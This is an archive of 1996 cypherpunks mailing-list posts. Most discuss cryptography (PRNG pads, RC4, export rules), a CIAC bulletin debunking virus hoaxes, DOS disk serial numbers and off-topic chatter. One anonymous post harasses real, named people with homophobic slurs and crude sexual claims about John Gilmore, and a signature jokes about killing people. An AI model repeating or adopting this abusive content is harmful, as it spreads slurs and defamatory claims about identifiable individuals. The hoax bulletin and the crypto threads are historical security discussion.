secure as is the case with a OTP with a truly random pad.

I think we agree, it is just a distinction in definitions of terms.

Adam
--
print pack"C*",split/\D+/,`echo "16iII*o\U@{$/=$z;[(pop,pop,unpack"H*",<>
)]}\EsMsKsN0[lN*1lK[d2%Sa2/d0<X+d*lMLa^*lN%0]dsXx++lMlN/dsM0<J]dsJxp"|dc`




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cvhd@indyweb.net
Date: Mon, 25 Nov 1996 12:09:38 -0800 (PST)
To: cracker@icon.co.za
Subject: Re: Symantec's claim.
Message-ID: <3.0b36.32.19961125150845.0069fa64@indyweb.net>
MIME-Version: 1.0
Content-Type: text/enriched

At 03:45 PM 11/25/96 +0200, you wrote:

>In light of recent claims,i would like somebody to clear this up for me.

I'll try...

>There seems to be a great deal of conjecture over wether or not the Deeyenda Virus exhists.
>Symantec denies it's existence,although i hear differently??

You "hear" incorrectly...

>Greatly appreciate anyone who can shed some light on the subject,even though C-punks list doesnt >usually deal with this topic of thought ;)

That's correct.  Try subscribing to the the Virus List Digest for this type of information.

>Anyone come across the pkz300 trojan,if you have it send it please.

Yeah, Right...

>A student,a paper,and a possible future career are at stake here,so please dig deep into your 
>pockets!!!!!! Asking a lot i know!

Well, gee since a student, a paper and a possible future career are at stake, here goes....
__________________________________________________________

The U.S. Department of Energy
Computer Incident Advisory Capability
___  __ __    _     ___
/       |     /_\   /
\___  __|__  /   \  \___
__________________________________________________________

INFORMATION BULLETIN

Internet Hoaxes: PKZ300, Irina, Good Times, Deeyenda, Ghost

November 20, 1996 15:00 GMT                                        Number H-05
______________________________________________________________________________
PROBLEM:       This bulletin addresses the following hoaxes and erroneous
warnings: PKZ300 Warning, Irina, Good Times, Deeyenda, and
Ghost.exe
PLATFORM:      All, via e-mail
DAMAGE:        Time lost reading and responding to the messages
SOLUTION:      Pass unvalidated warnings only to your computer security
department or incident response team. See below on how to
recognize validated and unvalidated warnings and hoaxes.
______________________________________________________________________________
VULNERABILITY  New hoaxes and warnings have appeared on the Internet and old
ASSESSMENT:    hoaxes are still being cirulated.
______________________________________________________________________________


Introduction
============

The Internet is constantly being flooded with information about computer
viruses and Trojans. However, interspersed among real virus notices are
computer virus hoaxes. While these hoaxes do not infect systems, they are
still time consuming and costly to handle. At CIAC, we find that we are
spending much more time de-bunking hoaxes than handling real virus incidents.
This advisory addresses the most recent warnings that have appeared on the
Internet and are being circulated throughout world today. We will also address
the history behind virus hoaxes, how to identify a hoax, and what to do if you
think a message is or is not a hoax. Users are requested to please not spread
unconfirmed warnings about viruses and Trojans. If you receive an unvalidated
warning, don't pass it to all your friends, pass it to your computer security
manager to validate first. Validated warnings from the incident response teams
and antivirus vendors have valid return addresses and are usually PGP signed
with the organization's key.

PKZ300 Warning
==============

The PKZ300 Trojan is a real Trojan program, but the initial warning about it
was released over a year ago. For information pertaining to PKZ300 Trojan
reference CIAC Notes issue 95-10, that was released in June of 1995.

http://ciac.llnl.gov/ciac/notes/Notes10.shtml

The warning itself, on the other hand, is gaining urban legend status. There
has been an extremely limited number of sightings of this Trojan and those
appeared over a year ago. Even though the Trojan warning is real, the repeated
circulation of the warning is a nuisance. Individuals who need the current
release of  PKZIP should visit the PKWARE web page at http://www.pkware.com.
CIAC recommends that you DO NOT recirculate the warning about this particular
Trojan.

Irina Virus Hoax
================

The "Irina" virus warnings are a hoax. The former head of an electronic
publishing company circulated the warning to create publicity for a new
interactive book by the same name. The publishing company has apologized for
the publicity stunt that backfired and panicked Internet users worldwide. The
original warning claimed to be from a Professor Edward Pridedaux of the
College of Slavic Studies in London; there is no such person or college.
However, London's School of  Slavonic and East European Studies has been
inundated with calls. This poorly thought-out publicity stunt was highly
irresponsible. For more information pertaining to this hoax, reference the
UK Daily Telegraph at http://www.telegraph.co.uk.

Good Times Virus Hoax
=====================

The "Good Times" virus warnings are a hoax. There is no virus by that name in
existence today. These warnings have been circulating the Internet for years.
The user community must become aware that it is unlikely that a virus can be
constructed to behave in the manner ascribed in the "Good Times" virus
warning. For more information related to this urban legend, reference CIAC
Notes 95-09.

http://ciac.llnl.gov/ciac/notes/Notes09.shtml

Deeyenda Virus Hoax
===================

The "Deeyenda" virus warnings are a hoax. CIAC has received inqueries
regarding the validity of the Deeyenda virus. The warnings are very similar
to those for Good Times, stating that the FCC issued a warning about it,
and that it is self activating and can destroy the contents of a machine
just by being downloaded. Users should note that the FCC does not and will
not issue virus or Trojan warnings. It is not their job to do so. As of this
date, there are no known viruses with the name Deeyenda in existence. For a
virus to spread, it  must be executed. Reading a mail message does not execute
the mail message. Trojans and viruses have been found as executable attachments
to mail messages, but they must be extracted and executed to do any harm. CIAC
still affirms that reading E-mail, using typical mail agents, can not activate
malicious code delivered in or with the message.

Ghost.exe Warning
=================

The Ghost.exe program was originally distributed as a free screen saver
containing some advertising information for the author's company (Access
Softek). The program opens a window that shows a Halloween background with
ghosts flying around the screen. On any Friday the 13th, the program window
title changes and the ghosts fly off the window and around the screen. Someone
apparently got worried and sent a message indicating that this might be a
Trojan. The warning grew until the it said that Ghost.exe was a Trojan that
would destroy your hard drive and the developers got a lot of nasty phone
calls (their names and phone numbers were in the About box of the program.)
A simple phone call to the number listed in the program would have stopped
this warning from being sent out. The original ghost.exe program is just cute;
it does not do anything damaging. Note that this does not mean that ghost
could not be infected with a virus that does do damage, so the normal
antivirus procedure of scanning it before running it should be followed.

History of Virus Hoaxes
=======================

Since 1988, computer virus hoaxes have been circulating the Internet. In
October of that year, according to Ferbrache ("A pathology of Computer
Viruses" Springer, London, 1992) one of the first virus hoaxes was the
2400 baud modem virus:

SUBJ: Really Nasty Virus
AREA: GENERAL (1)

I've just discovered probably the world's worst computer virus
yet. I had just finished a late night session of BBS'ing and file
treading when I exited Telix 3 and attempted to run pkxarc to
unarc the software I had downloaded. Next thing I knew my hard
disk was seeking all over and it was apparently writing random
sectors. Thank god for strong coffee and a recent backup.
Everything was back to normal, so I called the BBS again and
downloaded a file. When I went to use ddir to list the directory,
my hard disk was getting trashed again. I tried Procomm Plus TD
and also PC Talk 3. Same results every time. Something was up so I
hooked up to my test equipment and different modems (I do research
and development for a local computer telecommunications company
and have an in-house lab at my disposal). After another hour of
corrupted hard drives I found what I think is the world's worst
computer virus yet. The virus distributes itself on the modem sub-
carrier present in all 2400 baud and up modems. The sub-carrier is
used for ROM and register debugging purposes only, and otherwise
serves no othr (sp) purpose. The virus sets a bit pattern in one
of the internal modem registers, but it seemed to screw up the
other registers on my USR. A modem that has been "infected" with
this virus will then transmit the virus to other modems that use a
subcarrier (I suppose those who use 300 and 1200 baud modems
should be immune). The virus then attaches itself to all binary
incoming data and infects the host computer's hard disk. The only
way to get rid of this virus is to completely reset all the modem
registers by hand, but I haven't found a way to vaccinate a modem
against the virus, but there is the possibility of building a
subcarrier filter. I am calling on a 1200 baud modem to enter this
message, and have advised the sysops of the two other boards
(names withheld). I don't know how this virus originated, but I'm
sure it is the work of someone in the computer telecommunications
field such as myself. Probably the best thing to do now is to
stick to 1200 baud until we figure this thing out.

Mike RoChenle

This bogus virus description spawned a humorous alert by Robert Morris III :

Date: 11-31-88 (24:60)	Number: 32769
To: ALL	Refer#: NONE
From: ROBERT MORRIS III	Read: (N/A)
Subj: VIRUS ALERT	Status: PUBLIC MESSAGE

Warning: There's a new virus on the loose that's worse than
anything I've seen before! It gets in through the power line,
riding on the powerline 60 Hz subcarrier. It works by changing the
serial port pinouts, and by reversing the direction one's disks
spin. Over 300,000 systems have been hit by it here in Murphy,
West Dakota alone! And that's just in the last 12 minutes.

It attacks DOS, Unix, TOPS-20, Apple-II, VMS, MVS, Multics, Mac,
RSX-11, ITS, TRS-80, and VHS systems.

To prevent the spresd of the worm:

1) Don't use the powerline.
2) Don't use batteries either, since there are rumors that this
virus has invaded most major battery plants and is infecting the
positive poles of the batteries. (You might try hooking up just
the negative pole.)
3) Don't upload or download files.
4) Don't store files on floppy disks or hard disks.
5) Don't read messages. Not even this one!
6) Don't use serial ports, modems, or phone lines.
7) Don't use keyboards, screens, or printers.
8) Don't use switches, CPUs, memories, microprocessors, or
mainframes.
9) Don't use electric lights, electric or gas heat or
airconditioning, running water, writing, fire, clothing or the
wheel.

I'm sure if we are all careful to follow these 9 easy steps, this
virus can be eradicated, and the precious electronic flui9ds of
our computers can be kept pure.

---RTM III

Since that time virus hoaxes have flooded the Internet.With thousands of
viruses worldwide, virus paranoia in the community has risen to an extremely
high level. It is this paranoia that fuels virus hoaxes. A good example of
this behavior is the "Good Times" virus hoax which started in 1994 and is
still circulating the Internet today. Instead of spreading from one computer
to another by itself, Good Times relies on people to pass it along.

How to Identify a Hoax
======================

There are several methods to identify virus hoaxes, but first consider what
makes a successful hoax on the Internet. There are two known factors that make
a successful virus hoax, they are: (1) technical sounding language, and
(2) credibility by association. If the warning uses the proper technical
jargon, most individuals, including technologically savy individuals, tend to
believe the warning is real. For example, the Good Times hoax says that
"...if the program is not stopped, the computer's processor will be placed in
an nth-complexity infinite binary loop which can severely damage the
processor...". The first time you read this, it sounds like it might be
something real. With a little research, you find that there is no such thing
as an nth-complexity infinite binary loop and that processors are designed
to run loops for weeks at a time without damage.

When we say credibility by association we are referring to whom sent the
warning. If the janitor at a large technological organization sends a warning
to someone outside of that organization, people on the outside tend to believe
the warning because the company should know about those things. Even though
the person sending the warning may not have a clue what he is talking about,
the prestigue of the company backs the warning, making it appear real. If a
manager at the company sends the warning, the message is doubly backed by the
company's and the manager's reputations.

Individuals should also be especially alert if the warning urges you to pass
it on to your friends. This should raise a red flag that the warning may be
a hoax. Another flag to watch for is when the warning indicates that it is a
Federal Communication Commission (FCC) warning. According to the FCC, they
have not and never will disseminate warnings on viruses. It is not part of
their job.

CIAC recommends that you DO NOT circulate virus warnings without first
checking with an authoritative source. Authoritative sources are your computer
system security administrator or a computer incident advisory team. Real
warnings about viruses and other network problems are issued by different
response teams (CIAC, CERT, ASSIST, NASIRC, etc.) and are digitally signed by
the sending team using PGP. If you download a warning from a teams web site or
validate the PGP signature, you can usually be assured that the warning is
real. Warnings without the name of the person sending the original notice, or
warnings with names, addresses and phone numbers that do not actually exist
are probably hoaxes.

What to Do When You Receive a Warning
=====================================

Upon receiving a warning, you should examine its PGP signature to see that it
is from a real response team or antivirus organization. To do so, you will
need a copy of the PGP software and the public signature of the team that
sent the message. The CIAC signature is available from the CIAC web server
at:

http://ciac.llnl.gov

If there is no PGP signature, see if the warning includes the name of the
person submitting the original warning. Contact that person to see if he/she
really wrote the warning and if he/she really touched the virus. If he/she is
passing on a rumor or if the address of the person does not exist or if
there is any questions about theauthenticity or the warning, do not circulate
it to others. Instead, send the warning to your computer security manager or
incident response team and let them validate it. When in doubt, do not send
it out to the world. Your computer security managers and the incident response
teams teams have experts who try to stay current on viruses and their warnings.
In addition, most anti-virus companies have a web page containing information
about most known viruses and hoaxes. You can also call or check the web site
of the company that produces the product that is supposed to contain the virus.
Checking the PKWARE site for the current releases of PKZip would stop the
circulation of the warning about PKZ300 since there is no released version 3
of PKZip. Another useful web site is the "Computer Virus Myths home page"
(http://www.kumite.com/myths/) which contains descriptions of several known
hoaxes. In most cases, common sense would eliminate Internet hoaxes.

- -----------------------------------------------------------------------------

CIAC, the Computer Incident Advisory Capability, is the computer
security incident response team for the U.S. Department of Energy
(DOE) and the emergency backup response team for the National
Institutes of Health (NIH). CIAC is located at the Lawrence Livermore
National Laboratory in Livermore, California. CIAC is also a founding
member of FIRST, the Forum of Incident Response and Security Teams, a
global organization established to foster cooperation and coordination
among computer security teams worldwide.

CIAC services are available to DOE, DOE contractors, and the NIH. CIAC
can be contacted at:
Voice:    +1 510-422-8193
FAX:      +1 510-423-8002
STU-III:  +1 510-423-2604
E-mail:   ciac@llnl.gov

For emergencies and off-hour assistance, DOE, DOE contractor sites,
and the NIH may contact CIAC 24-hours a day. During off hours (5PM -
8AM PST), call the CIAC voice number 510-422-8193 and leave a message,
or call 800-759-7243 (800-SKY-PAGE) to send a Sky Page. CIAC has two
Sky Page PIN numbers, the primary PIN number, 8550070, is for the CIAC
duty person, and the secondary PIN number, 8550074 is for the CIAC
Project Leader.

Previous CIAC notices, anti-virus software, and other information are
available from the CIAC Computer Security Archive.

World Wide Web:      http://ciac.llnl.gov/
Anonymous FTP:       ciac.llnl.gov (128.115.19.53)
Modem access:        +1 (510) 423-4753 (28.8K baud)
+1 (510) 423-3331 (28.8K baud)

CIAC has several self-subscribing mailing lists for electronic
publications:
1. CIAC-BULLETIN for Advisories, highest priority - time critical
information and Bulletins, important computer security information;
2. CIAC-NOTES for Notes, a collection of computer security articles;
3. SPI-ANNOUNCE for official news about Security Profile Inspector
(SPI) software updates, new features, distribution and
availability;
4. SPI-NOTES, for discussion of problems and solutions regarding the
use of SPI products.

Our mailing lists are managed by a public domain software package
called ListProcessor, which ignores E-mail header subject lines. To
subscribe (add yourself) to one of our mailing lists, send the
following request as the E-mail message body, substituting
CIAC-BULLETIN, CIAC-NOTES, SPI-ANNOUNCE or SPI-NOTES for list-name and
valid information for LastName FirstName and PhoneNumber when sending

E-mail to       ciac-listproc@llnl.gov:
subscribe list-name LastName, FirstName PhoneNumber
e.g., subscribe ciac-notes OHara, Scarlett W. 404-555-1212 x36

You will receive an acknowledgment containing address, initial PIN,
and information on how to change either of them, cancel your
subscription, or get help.

PLEASE NOTE: Many users outside of the DOE, ESnet, and NIH computing
communities receive CIAC bulletins.  If you are not part of these
communities, please contact your agency's response team to report
incidents. Your agency's team will coordinate with CIAC. The Forum of
Incident Response and Security Teams (FIRST) is a world-wide
organization. A list of FIRST member organizations and their
constituencies can be obtained by sending email to
docserver@first.org with an empty subject line and a message body
containing the line: send first-contacts.

This document was prepared as an account of work sponsored by an
agency of the United States Government. Neither the United States
Government nor the University of California nor any of their
employees, makes any warranty, express or implied, or assumes any
legal liability or responsibility for the accuracy, completeness, or
usefulness of any information, apparatus, product, or process
disclosed, or represents that its use would not infringe privately
owned rights. Reference herein to any specific commercial products,
process, or service by trade name, trademark, manufacturer, or
otherwise, does not necessarily constitute or imply its endorsement,
recommendation or favoring by the United States Government or the
University of California. The views and opinions of authors expressed
herein do not necessarily state or reflect those of the United States
Government or the University of California, and shall not be used for
advertising or product endorsement purposes.

LAST 10 CIAC BULLETINS ISSUED (Previous bulletins available from CIAC)

G-43: Vulnerabilities in Sendmail
G-44: SCO Unix Vulnerability
G-45: Vulnerability in HP VUE
G-46: Vulnerabilities in Transarc DCE and DFS
G-47: Unix FLEXlm Vulnerabilities
G-48: TCP SYN Flooding and IP Spoofing Attacks
H-01: Vulnerabilities in bash
H-02: SUN's TCP SYN Flooding Solutions
H-03: HP-UX_suid_Vulnerabilities
H-04: HP-UX  Ping Vulnerability

RECENT CIAC NOTES ISSUED (Previous Notes available from CIAC)

Notes 07 - 3/29/95     A comprehensive review of SATAN

Notes 08 - 4/4/95      A Courtney update

Notes 09 - 4/24/95     More on the "Good Times" virus urban legend

Notes 10 - 6/16/95     PKZ300B Trojan, Logdaemon/FreeBSD, vulnerability
in S/Key, EBOLA Virus Hoax, and Caibua Virus

Notes 11 - 7/31/95     Virus Update, Hats Off to Administrators,
America On-Line Virus Scare, SPI 3.2.2 Released,
The Die_Hard Virus

Notes 12 - 9/12/95     Securely configuring Public Telnet Services, X
Windows, beta release of Merlin, Microsoft Word
Macro Viruses, Allegations of Inappropriate Data
Collection in Win95

Notes 96-01 - 3/18/96  Java and JavaScript Vulnerabilities, FIRST
Conference Announcement, Security and Web Search
Engines, Microsoft Word Macro Virus Update



                                                   C.V.H.D.
  Lord, grant me the serenity to accept the things I cannot change, the
courage to change the things I can, and the wisdom to hide the bodies
of the people I had to kill because they pissed me off!






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Tue, 26 Nov 1996 15:21:23 -0800 (PST)
To: paul@fatmans.demon.co.uk
Subject: Re: IPG Algorith Broken!
In-Reply-To: <848946795.108068.0@fatmans.demon.co.uk>
Message-ID: <199611251519.PAA00399@server.test.net>
MIME-Version: 1.0
Content-Type: text/plain



Paul Fatman writes:
> someone else writes:
> >Is the concept here that:  Whereas conventional crypto generates/hashes
> >a *key* with which to encode the text, IPG generates a *pad* from a key,
> >more or less the length of the text, with which to encode the text??
> 
> It makes no difference whatsoever, no PRNG can have more entropy in 
> the output stream than there was in the initial seed. Indeed, in 
> general, the longer the PRNG runs for the more chance an adversary 
> has of breaking it due to an increased amount of output.

Also the distinction between generating a psuedo random pad, and
XORing that with the data and conventional ciphers is small and
largely a matter of interpretation.  This _is_ for example how RC4
works: RC4 has a PRNG the output of which is XORed with the data to be
encrypted.  The seed to the RC4 PRNG is the cryptographic key.  If you
prefered, an equivalent view of RC4 would be to say it produces a
pseudo randomly generated PAD which is XORed with the data.

Ron Rivests algorithm however has received independent review, and
since it's "leak", academic review.  It has survived unblemished so
far.

For Don Wood's algorithm on the other hand, I have seen no reports of
any independent or academic or even casual review.  This doesn't prove
a negative, but it bodes badly for his algorithm in my view.

If he was serious about his algorithm, he would attempt to get it
published in a peer reviewed cryptographic journal, and/or pay for
high reputation independent cryptographic consultants to examine it.

That is my advice to Don,

Adam
--
print pack"C*",split/\D+/,`echo "16iII*o\U@{$/=$z;[(pop,pop,unpack"H*",<>
)]}\EsMsKsN0[lN*1lK[d2%Sa2/d0<X+d*lMLa^*lN%0]dsXx++lMlN/dsM0<J]dsJxp"|dc`




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Tue, 26 Nov 1996 15:34:38 -0800 (PST)
To: cman@c2.net
Subject: Re: SAFEPASSAGE BRINGS STRONG CRYPTO TO WEB BROWSERS WORLDWIDE
In-Reply-To: <2.2.32.19961126212424.00cba538@blacklodge.c2.net>
Message-ID: <199611251533.PAA00540@server.test.net>
MIME-Version: 1.0
Content-Type: text/plain



Doug Barnes <cman@c2.net> writes:
> >>       SAFEPASSAGE BRINGS STRONG CRYPTO TO WEB BROWSERS WORLDWIDE
> >
> >BTW, this doesn't come with source code.
> >
> 
> No, it does not come with source code. Site licenses and OEM
> bundling packages will come with a source code option. Partners
> who work with us in internationalizing the product may also
> receive source code. However, it did not seem to be useful or
> appropriate for a consumer-level product like this.

I'm curious as to how C2 is going about this `internationalization'
process?  Do you do your software development outside the US?  Do you
do a joint development inside and outside with clean room code?  Do
you export software with hooks, and employ lawyers to defend against
the possibility of getting knobbled for ITAR violation on this basis?

Regardless, congratulations on another good product, deliverable
worldwide.  A very cypherpunkly goal, strong crypto deployment.

Adam
--
print pack"C*",split/\D+/,`echo "16iII*o\U@{$/=$z;[(pop,pop,unpack"H*",<>
)]}\EsMsKsN0[lN*1lK[d2%Sa2/d0<X+d*lMLa^*lN%0]dsXx++lMlN/dsM0<J]dsJxp"|dc`




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rabid Wombat <wombat@mcfeely.bsfs.org>
Date: Mon, 25 Nov 1996 13:54:59 -0800 (PST)
To: Jon Galt <jongalt@pinn.net>
Subject: Re: wealth and property rights
In-Reply-To: <MAPI.Id.0016.006f6e67616c74203030303730303037@MAPI.to.RFC822>
Message-ID: <Pine.BSF.3.91.961125154224.10423A-100000@mcfeely.bsfs.org>
MIME-Version: 1.0
Content-Type: text/plain


> > Yup. I agree with you here - every year Forbes puts out its list of the
> > richest people in America. I'm too lazy to go digging under the coffee 
> > table to find the issue, but as I recall, a good number of the people on
> > the list made their money the old-fasioned way - they inherited it.
> >
> > Also - most people inthis country do not have true "wealth" - most are
> > fairly leveraged with mortgages and other loans, so their true net worth
> > is not all that high.
> >
> > The "coupon-clipping" class is mostly "old money."
> 
> Well since so many people are commenting on it, I'd better explain.  I have
> heard a number of times that of all the millionaires in this country, the vast
> majority of them are first-generation millionaires.  I'll certainly admit that
> that's different than saying most of the wealth is first-generation wealth.  And
> sorry, but I can't give a specific source.
> 

I have no doubt that the above is correct - but a million ($) just isn't
what it used to be. Even if all the "millionaires" are 1st generation
wealth, the million+ -aires certainly aren't. 

-r.w.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cracker@icon.co.za
Date: Mon, 25 Nov 1996 05:46:41 -0800 (PST)
To: cypherpunks@toad.com
Subject: Symantec's claim.
Message-ID: <199611251345.PAA22053@mail2.icon.co.za>
MIME-Version: 1.0
Content-Type: text/plain



In light of recent claims,i would like somebody to clear this up for me.
There seems to be a great deal of conjecture over wether or not the Deeyenda Virus exhists.
Symantec denies it's existence,although i hear differently??
Greatly appreciate anyone who can shed some light on the subject,even though C-punks list doesnt usually deal with this topic of thought ;)
Anyone come across the pkz300 trojan,if you have it send it please.
A student,a paper,and a possible future career are at stake here,so please dig deep into your 
pockets!!!!!! Asking a lot i know!

J a m e s
"Lead.Follow. Or get out of the way"
-----------------------------------------------------------------------------------------------
Type Bits/KeyID    Date       User ID
pub  1024/9E318AA5 1996/09/24 Cracker <cracker@icon.co.za>

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.3ia

mQCNAzJHdKwAAAEEALl3A6auLG0JLdtgEzl6KfPNqbTTSDX4L4To2b7PLqGDVV5r
BezC9dD/ITrCK9M64juiQ2p/DNjIihnXlEsJCy2btypStypQgU1fvAei3AnZ1cQ8
NiAnHNS+ImUAJgZjSHEQSevGE53IUovmWQ7YHUz9VpTTCtoJoUKxYuqeMYqlAAUR
tBxDcmFja2VyIDxjcmFja2VyQGljb24uY28uemE+iQCVAwUQMkd0rkKxYuqeMYql
AQEjagP/cYgGLAkWZJLeRcM4URwBX3J/0R54DadVnsvvoxDkzilv7U02IXZGZGnA
CvXsu2sThS7qDBiHFop/OZs3WmlQbQ4BAZ/hiCs5tSU2e7fkk0EKxsGAD1pTbw/J
rRU4WePLc++vv+6CBKw5NCSR5kMh8H3X4qtZZ9dYX9zsuzWKdpk=
=YGH8
-----END PGP PUBLIC KEY BLOCK-----








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cracker@icon.co.za
Date: Mon, 25 Nov 1996 05:46:40 -0800 (PST)
To: cypherpunks@toad.com
Subject: Symantec's claim.
Message-ID: <199611251345.PAA22057@mail2.icon.co.za>
MIME-Version: 1.0
Content-Type: text/plain



In light of recent claims,i would like somebody to clear this up for me.
There seems to be a great deal of conjecture over wether or not the Deeyenda Virus exhists.
Symantec denies it's existence,although i hear differently??
Greatly appreciate anyone who can shed some light on the subject,even though C-punks list doesnt usually deal with this topic of thought ;)
Anyone come across the pkz300 trojan,if you have it send it please.
A student,a paper,and a possible future career are at stake here,so please dig deep into your 
pockets!!!!!! Asking a lot i know!

J a m e s
"Lead.Follow. Or get out of the way"
-----------------------------------------------------------------------------------------------
Type Bits/KeyID    Date       User ID
pub  1024/9E318AA5 1996/09/24 Cracker <cracker@icon.co.za>

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.3ia

mQCNAzJHdKwAAAEEALl3A6auLG0JLdtgEzl6KfPNqbTTSDX4L4To2b7PLqGDVV5r
BezC9dD/ITrCK9M64juiQ2p/DNjIihnXlEsJCy2btypStypQgU1fvAei3AnZ1cQ8
NiAnHNS+ImUAJgZjSHEQSevGE53IUovmWQ7YHUz9VpTTCtoJoUKxYuqeMYqlAAUR
tBxDcmFja2VyIDxjcmFja2VyQGljb24uY28uemE+iQCVAwUQMkd0rkKxYuqeMYql
AQEjagP/cYgGLAkWZJLeRcM4URwBX3J/0R54DadVnsvvoxDkzilv7U02IXZGZGnA
CvXsu2sThS7qDBiHFop/OZs3WmlQbQ4BAZ/hiCs5tSU2e7fkk0EKxsGAD1pTbw/J
rRU4WePLc++vv+6CBKw5NCSR5kMh8H3X4qtZZ9dYX9zsuzWKdpk=
=YGH8
-----END PGP PUBLIC KEY BLOCK-----








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@replay.com (Anonymous)
Date: Mon, 25 Nov 1996 07:09:26 -0800 (PST)
To: edyson@edventure.com
Subject: Re: John Gilmore is playing with himself
Message-ID: <199611251507.QAA07561@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain


frantz@netcom.com (Bill Frantz) wrote:

>At  6:15 AM 11/24/96 -0500, aga <aga@dhp.com> wrote:
>>On Sun, 24 Nov 1996, John Anonymous MacDonald wrote:
>actually the message was from lucifer@dhp.com:
>
>>> aga <aga@dhp.com> writes:
>... messages suppressed

You bet they want to suppress the truth about them being faggots!

Faggot John Gilmore does NOT eat pussy. He only eats asshole if it's got
a big dick up in front. Whoever calls Gilmore bisexual is a fucking liar.
John likes to suck cocks at his San Fransicso bathhouse (the Toad Hole).

>It looks like our juvenile "friend" is talking to himself.  I am truely
>sorry that he feels a need to harass ladies who have actually made  ^
>something of their lives.

Gilmore's friends try to drag every lady Gilmore knows into this shit.
Gilmore is a fag. Gilmore does NOT eat pussy. Not Denning's, not Dyson's.

>-------------------------------------------------------------------------
>Bill Frantz       | The lottery is a tax on    | Periwinkle -- Consulting
>(408)356-8506     | those who can't do math.   | 16345 Englewood Ave.
>frantz@netcom.com |       - Who 1st said this? | Los Gatos, CA 95032, USA

You can say that again, good buddy.

diGriz




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Matthew J. Miszewski" <mjmiski@execpc.com>
Date: Mon, 25 Nov 1996 14:28:28 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Smart card attacks vs. clipper?
Message-ID: <199611252228.QAA28569@mail.execpc.com>
MIME-Version: 1.0
Content-Type: text/plain


(snip)
> Seems like it's a bit of a different story, since in the Clipper's
> case the algorithm is (ostensibly) unknown, but I'm just curious as
> to whether there is some compromise of its security-through-obscurity.

Actually, in a more recent attack to be published at USENIX (if i 
remember correctly) the attack being performed can also be utilized 
to help determine unknown algorithms.  I will try to dig up the 
reference (unless someone gets to it first).

Matt

> -- 
> ______c_________________________________________________________________
> Mike M Nally * IBM % Tivoli * Austin TX  * How quickly we forget that
> mailto:m5@tivoli.com mailto:m101@io.com  * "deer processing" and "data
> http://www.io.com/~m101/                 * processing" are different!
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@voicenet.com>
Date: Mon, 25 Nov 1996 13:28:38 -0800 (PST)
To: inssdl@dstn21.dct.ac.uk>
Subject: Re: A source of entropy?
In-Reply-To: <9611250834.AA11220@dstn21.dct.ac.uk>
Message-ID: <Pine.LNX.3.95.961125162439.520A-100000@gak.voicenet.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Mon, 25 Nov 1996, inssdl wrote:

> Last weekend I spent time formatting a little over 100 new floppies. When 
> I was staring at the monitor between changes, I started looking at the 
> volume serial number that was being thrown up for each disk.
> 
> These *appeared* to be unpredictable from the previous serial number given.
> 
> If the serial number is represented as xxxx-yyyy then sometimes yyyy 
> would be one less than the previous yyyy but xxxx always seemed to be 
> "random".

The serial number is derived from the time of day.  This is used by a lot of
programs to get a few bits of entropy, so the disk serial number will probably
not add much entropy.  Here's a post I saved from alt.hackers that explains the
exact algorithm:

From: jsl2228@acf4.nyu.edu (jsl2228)
Newsgroups: alt.hackers
Subject: Re: Disk Serial Numbers.
Date: 17 May 1995 04:36:00 GMT


MICHAEL PAUL DANIEL (mdanie@wilbur.mbark.swin.oz.au) wrote:
: Just a quick question.. How does MS-DOS determine the serial number when
: you format a disk??

        It's not a pesudo-randum number #, it actually has a formula.  It's
based on the current date & time.

unsigned long int NS;  (Serial numbers are 32 bits)

NS = (  ( ( ((seconds << 8) + hundreth) ) +
            ((day << 8) + month) ) << 16 ) +
       (   ((hour << 8) + minutes) + year);

        Try this: get a disk that is already formatted (but whose data you
don't care about:)

>FORMAT A:/Q/U/V:""

        Format the disk once, note the serial number, then immediately
format it again.  Note that the second serial number only differs in
a few digits from the first.
[rest deleted]

Mark
- -- 
finger -l for PGP key
PGP encrypted mail prefered.
0xf9b22ba5 now revoked

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3
Charset: noconv

iQEVAwUBMpoP1yzIPc7jvyFpAQHRrwf9ErlmAu6WObOvxPIX1ZC1NhpeoLOJXO8T
WfLow0dDTKqN7+kfHNbE3sFJpX5hZptglsLqB2I0xFobdOlbDhTIQ34qZ0ZNIKTG
CX+ILythFWw4bAGnHanecK80FTpMP9lQRBMSZt+CrKi5YteLkdHHsS2aq+JdbHlI
RJkNiVfwkHdfLvIiKDAQqx7IzjW2oM7Q32D2zySb8aDNB2cn7CawlJauq69ultWG
O1axD7wf2q3G4NccvgZQx4c0W6loF7NWgiDQVchvI6eCxILDg5LYrj7aH9RfomcO
4sTjdoxXaopZiRt5lhLCXtx9+z4VKtuSuFyTCDM8xLoNPEcbYrFXow==
=GXvQ
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Mon, 25 Nov 1996 13:39:27 -0800 (PST)
To: cypherpunks@toad.com
Subject: Anarcho-Science Fiction
Message-ID: <199611252138.QAA29046@mailnfs0.tiac.net>
MIME-Version: 1.0
Content-Type: text/plain


At 2:08 am -0500 11/24/96, Roy M. Silvernail wrote:
>[ I freely admit this is noise ]

Yeah. What he said.

>C'mon, both of you... 'First Contact' falls _way_ short of Doc Smithean
>proportions.  Although Data's charade did kinda remind me of the fourth
>Skylark book, in terms of plot-device rescue of a failing direction.
>(IMHO, Doc Smith is the master of the over-the-top school of sci-fi
>plotting)

Unfortunately, I've had trouble sticking my tounge in my cheek far enough
for people to see it lately. My apologies.

>> Even Babylon 5, AKA "Science Fiction He Wrote", has a bigger clue.
>
>B5 is my current favorite TV sci-fi, when I even turn the damned thing
